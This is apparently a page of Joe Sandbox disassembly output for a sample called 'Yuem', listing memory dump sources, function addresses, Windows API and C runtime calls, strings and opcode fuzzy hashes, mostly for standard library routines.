Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e56eadfd9d749740cb826f32f74198886607e26796b10d8c30a6f334eeb8f307
Instruction ID: cda904d18adf64f6e618231e395645a84096521d265e4740a188dd401760abf1
Opcode Fuzzy Hash: e56eadfd9d749740cb826f32f74198886607e26796b10d8c30a6f334eeb8f307
Instruction Fuzzy Hash: 44519BB6A017098FDB15CFA4E8957AEB7F0FB48314F24842AD610EB354D3749A41CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00D20243 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00D20243

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 05fb3a541a94de6a56a686ae22103da1612eb3d9b0d144977f68dc520071f59b
Instruction ID: 25c99c9867281e63969c7590db185c88edb2f9ac34e79d19ea5c41725eb521ba
Opcode Fuzzy Hash: 05fb3a541a94de6a56a686ae22103da1612eb3d9b0d144977f68dc520071f59b
Instruction Fuzzy Hash: CCA012306003018B47048F325E08209359855422D030480155005C1220D6204044AF10

Uniqueness

Uniqueness Score: -1.00%

Function 00CFE47E Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00D48640,00000FA0,?,?,00CFE45C), ref: 00CFE48A
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00CFE45C), ref: 00CFE495
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CFE45C), ref: 00CFE4A6
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CFE4B8
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CFE4C6
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00CFE45C), ref: 00CFE4E9
___scrt_fastfail.LIBCMT ref: 00CFE4FA
DeleteCriticalSection.KERNEL32(00D48640,00000007,?,?,00CFE45C), ref: 00CFE505
CloseHandle.KERNEL32(00000000,?,?,00CFE45C), ref: 00CFE515

Strings

WakeAllConditionVariable, xrefs: 00CFE4BE
kernel32.dll, xrefs: 00CFE4A1
SleepConditionVariableCS, xrefs: 00CFE4B2
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CFE490

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: 9dc0c80e1ac5ec1ef46bc79f49f07a2ddb4e60ec4896697690d334fead510cd6
Instruction ID: b8d94c60b3ac0f08f8a7f8af49d1f0b63abdc7c0b779b2bf5400bc924aac1ec8
Opcode Fuzzy Hash: 9dc0c80e1ac5ec1ef46bc79f49f07a2ddb4e60ec4896697690d334fead510cd6
Instruction Fuzzy Hash: 6F018F75A40711AFD7A02FB5AD0DE7A3AA8AB41B81B014424FA14D23A0DEA4CA04DA72

Uniqueness

Uniqueness Score: -1.00%

Function 00D13B1E Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00D13B30

Part of subcall function 00D1392E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00D13951

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00D13B51
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00D13B5E
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00D13BAC
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00D13C33
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00D13C46
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00D13C93

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 4cc737fc096292dc8fe4e7ff805f550c91fd029e7614ae73b388ac497e052b7d
Instruction ID: 2ce812192e185ca35e798357317c6ca1254abe20918cb33636300ffc96bd6fdd
Opcode Fuzzy Hash: 4cc737fc096292dc8fe4e7ff805f550c91fd029e7614ae73b388ac497e052b7d
Instruction Fuzzy Hash: 8B81AE30904249BBDF169F54EA41BFE7B72EF56304F080098EC516B292CB328E99DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D0592E Relevance: 21.2, APIs: 14, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00D05988

Part of subcall function 00D05769: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 00D05835
Part of subcall function 00D05769: InitializeSListHead.KERNEL32(?), ref: 00D0583F

ListArray.LIBCONCRT ref: 00D059BC
Hash.LIBCMT ref: 00D05A25
Hash.LIBCMT ref: 00D05A35
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00D05ACA
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00D05AD7
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00D05AE4
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 00D05AF1

Part of subcall function 00D0B091: std::bad_exception::bad_exception.LIBCMT ref: 00D0B0B3

RegisterWaitForSingleObject.KERNEL32(?,00000000,00D08E65,?,000000FF,00000000), ref: 00D05B79
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00D05B9B
GetLastError.KERNEL32(00D068DB,?,?,00000000,?,?), ref: 00D05BAD
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 00D05BCA

Part of subcall function 00D00FFA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,00D068DB,00000008,?,00D05BCF,?,00000000,00D08E56,?,7FFFFFFF,7FFFFFFF,00000000), ref: 00D01012

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00D05BF4

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: 21df7f94ae4240d97f94b0e08e275253514d12a01cc469891bb41da0c9829f4a
Instruction ID: e1f484abbabfb4171f09b5ff2b91ee39876007cbf8e45ef54dfc67425cc94fa4
Opcode Fuzzy Hash: 21df7f94ae4240d97f94b0e08e275253514d12a01cc469891bb41da0c9829f4a
Instruction Fuzzy Hash: DC814DB0A11B56BBD7089F748845BDAFBA8FF09710F10421AF52C97281CBB4A564CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00D03C82 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00D03C91

Part of subcall function 00D04F7C: GetVersionExW.KERNEL32(?), ref: 00D04FA0
Part of subcall function 00D04F7C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00D0503F

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00D03CA5
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00D03CC6
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00D03D2F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00D03D63

Part of subcall function 00D01C3D: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00D01C5D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00D03DE3

Part of subcall function 00D037AC: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00D037C0

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00D03E2B

Part of subcall function 00D01C12: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00D01C2E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00D03E3F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00D03E50
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00D03E9D
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00D03EC2
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00D03ECE

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 78003891be693b4704fe0ed32ef2c46739d2be6a26b639877e99d8c6d4b95a6e
Instruction ID: 9b4bdc61119c5d9877904563955e1b9d46c40f8b6b57017c47665d49a688a378
Opcode Fuzzy Hash: 78003891be693b4704fe0ed32ef2c46739d2be6a26b639877e99d8c6d4b95a6e
Instruction Fuzzy Hash: 2581D375A002569FCB18DF68D8816BDB7F9FF49340B28422EE449E3780DB709A41DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00D2073F Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00D20783

Part of subcall function 00D2031C: _free.LIBCMT ref: 00D20339
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D2034B
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D2035D
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D2036F
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D20381
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D20393
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D203A5
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D203B7
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D203C9
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D203DB
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D203ED
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D203FF
Part of subcall function 00D2031C: _free.LIBCMT ref: 00D20411

_free.LIBCMT ref: 00D20778

Part of subcall function 00D1C1D5: HeapFree.KERNEL32(00000000,00000000,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?), ref: 00D1C1EB
Part of subcall function 00D1C1D5: GetLastError.KERNEL32(?,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?,?), ref: 00D1C1FD

_free.LIBCMT ref: 00D2079A
_free.LIBCMT ref: 00D207AF
_free.LIBCMT ref: 00D207BA
_free.LIBCMT ref: 00D207DC
_free.LIBCMT ref: 00D207EF
_free.LIBCMT ref: 00D207FD
_free.LIBCMT ref: 00D20808
_free.LIBCMT ref: 00D20840
_free.LIBCMT ref: 00D20847
_free.LIBCMT ref: 00D20864
_free.LIBCMT ref: 00D2087C

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 0a38e1eac950a181040486488e67b1581b64bcc0d5720fed7b5d0996203bee8f
Instruction ID: ed3ab2e6200a37527e6547dd1462ee7e4bf168ec07a0e0844e4c4244d0de669e
Opcode Fuzzy Hash: 0a38e1eac950a181040486488e67b1581b64bcc0d5720fed7b5d0996203bee8f
Instruction Fuzzy Hash: B0314E71980715BFEB20AA39E849BA6BBE4EF50324F185429F459D7153EE70ACC08B70

Uniqueness

Uniqueness Score: -1.00%

Function 00D00EC1 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00D05036), ref: 00D00ECF
GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 00D00EDD
GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 00D00EEB
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 00D00F19
GetLastError.KERNEL32(?,?,?,00D05036), ref: 00D00F34
GetLastError.KERNEL32(?,?,?,00D05036), ref: 00D00F40
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00D00F56

Strings

kernel32.dll, xrefs: 00D00ECA
SetThreadGroupAffinity, xrefs: 00D00ED7
GetThreadGroupAffinity, xrefs: 00D00EE3
GetCurrentProcessorNumberEx, xrefs: 00D00F0E

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1654681794-465693683
Opcode ID: 9b94dc80154ce45ba7eae77075f8caf89256fe038919946a0f1b7d0a77ab04d6
Instruction ID: 5c103a4eaab984f3deb704c0b0e1656cd03a8f73756cedb77631b23d35e84608
Opcode Fuzzy Hash: 9b94dc80154ce45ba7eae77075f8caf89256fe038919946a0f1b7d0a77ab04d6
Instruction Fuzzy Hash: 3D01C8B5A04302BFC3146BB5AC4AB7B3EECED01754F14441AF409D22D2EEB0D4088671

Uniqueness

Uniqueness Score: -1.00%

Function 00D13DBD Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00D13DCF

Part of subcall function 00D1392E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00D13951

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00D13DF0
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00D13DFD
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00D13E4B
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00D13EF3
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00D13F25

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: ecbd77e97cf6851cf7883b7e52faf3ec56e4d1f800298cbbbb2c0ab9853107f3
Instruction ID: 4aa68ee05165d661e984403d7b795b2286a4ed449b5a7a20c5a73b737e1f0732
Opcode Fuzzy Hash: ecbd77e97cf6851cf7883b7e52faf3ec56e4d1f800298cbbbb2c0ab9853107f3
Instruction Fuzzy Hash: 1E716C70904249BBDF15DF58E981AEEBB72AF45304F084098F8416B292CB32DE96DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D166F5 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00D167F0
type_info::operator==.LIBVCRUNTIME ref: 00D16817
___TypeMatch.LIBVCRUNTIME ref: 00D16923
IsInExceptionSpec.LIBVCRUNTIME ref: 00D169FE
_UnwindNestedFrames.LIBCMT ref: 00D16A85
CallUnexpected.LIBVCRUNTIME ref: 00D16AA0

Strings

csm, xrefs: 00D16730
csm, xrefs: 00D1684E
csm, xrefs: 00D1679D

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 79fc9e15c385243e1ba06699c6e5b314f0e722522d30b28c5121df00d8a213ae
Instruction ID: 6114ffa78d15823ec03e0883f0bd9056b9f576de6934cbda7919f8d4d61a85d5
Opcode Fuzzy Hash: 79fc9e15c385243e1ba06699c6e5b314f0e722522d30b28c5121df00d8a213ae
Instruction Fuzzy Hash: 73C15971900209BFCF25DFA4E8819EEBBB5FF14310F18815AE8556B252DB31DA91CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D07E2A Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00D07E6F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00D07EA1
List.LIBCONCRT ref: 00D07EDC
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00D07EED
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00D07F09
List.LIBCONCRT ref: 00D07F44
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00D07F55
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00D07F70
List.LIBCONCRT ref: 00D07FAB
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00D07FB8

Part of subcall function 00D0732F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00D07347
Part of subcall function 00D0732F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00D07359

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 3e7383210ea719a90f40a6abc9ae793331250c2877147e1f4358083b4c951fa0
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: B4512E71E0420AABDB14DF64C595BEDB7A8FF48344F0544A9E949AB281DB30FE45CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D1B939 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D1B94F

Part of subcall function 00D1C1D5: HeapFree.KERNEL32(00000000,00000000,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?), ref: 00D1C1EB
Part of subcall function 00D1C1D5: GetLastError.KERNEL32(?,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?,?), ref: 00D1C1FD

_free.LIBCMT ref: 00D1B95B
_free.LIBCMT ref: 00D1B966
_free.LIBCMT ref: 00D1B971
_free.LIBCMT ref: 00D1B97C
_free.LIBCMT ref: 00D1B987
_free.LIBCMT ref: 00D1B992
_free.LIBCMT ref: 00D1B99D
_free.LIBCMT ref: 00D1B9A8
_free.LIBCMT ref: 00D1B9B6

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 48721582ef778253a53da14b473d308174fa5067168195791a17c07a94446175
Instruction ID: f4dd42f2fd6d7d29cf6bc2ae348176f995e05f85d6a37bdb1ad870079d9499d0
Opcode Fuzzy Hash: 48721582ef778253a53da14b473d308174fa5067168195791a17c07a94446175
Instruction Fuzzy Hash: 232187B699020CBFCB45EF94D885DDD7BB9EF08350F0051A6B9159B162EF31DA84CBA0

Uniqueness

Uniqueness Score: -1.00%

